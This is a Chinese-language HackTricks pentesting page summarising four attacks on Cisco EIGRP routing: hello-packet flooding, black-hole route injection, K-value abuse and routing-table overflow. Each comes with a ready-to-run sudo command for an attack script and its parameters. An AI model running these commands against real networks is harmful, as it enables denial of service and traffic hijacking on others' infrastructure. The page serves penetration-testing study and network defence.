# EIGRP Attacks

<details>

<summary><strong>从零开始学习 AWS 黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS 红队专家）</strong></a><strong>！</strong></summary>

支持 HackTricks 的其他方式：

* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)\*\* 上\*\*关注我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。

</details>

**这是** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **中公开的攻击摘要。请查看以获取更多信息。**

## **伪造 EIGRP 邻居攻击**

* **目标**：通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载，可能导致拒绝服务（DoS）攻击。
* **工具**：**helloflooding.py** 脚本。
* **执行**：

```bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
```

* **参数**：
  * `--interface`：指定网络接口，例如 `eth0`。
  * `--as`：定义 EIGRP 自治系统号，例如 `1`。
  * `--subnet`：设置子网位置，例如 `10.10.100.0/24`。

## **EIGRP 黑洞攻击**

* **目标**：通过注入虚假路由来破坏网络流量流向，导致流量被定向到不存在的目的地的黑洞。
* **工具**：**routeinject.py** 脚本。
* **执行**：

```bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
```

* **参数**：
  * `--interface`：指定攻击者系统的接口。
  * `--as`：定义 EIGRP AS 号。
  * `--src`：设置攻击者的 IP 地址。
  * `--dst`：设置目标子网 IP。
  * `--prefix`：定义目标子网 IP 的掩码。

## **滥用 K-Values 攻击**

* **目标**：通过注入修改后的 K-Values，在 EIGRP 域内创建持续的中断和重新连接，有效地导致 DoS 攻击。
* **工具**：**relationshipnightmare.py** 脚本。
* **执行**：

```bash
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
```

* **参数**：
  * `--interface`：指定网络接口。
  * `--as`：定义 EIGRP AS 号。
  * `--src`：设置合法路由器的 IP 地址。

## **路由表溢出攻击**

* **目标**：通过向路由表中注入大量虚假路由来使路由器的 CPU 和 RAM 负载过重。
* **工具**：**routingtableoverflow\.py** 脚本。
* **执行**：

```bash
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
```

* **参数**：
  * `--interface`：指定网络接口。
  * `--as`：定义 EIGRP AS 号。
  * `--src`：设置攻击者的 IP 地址。
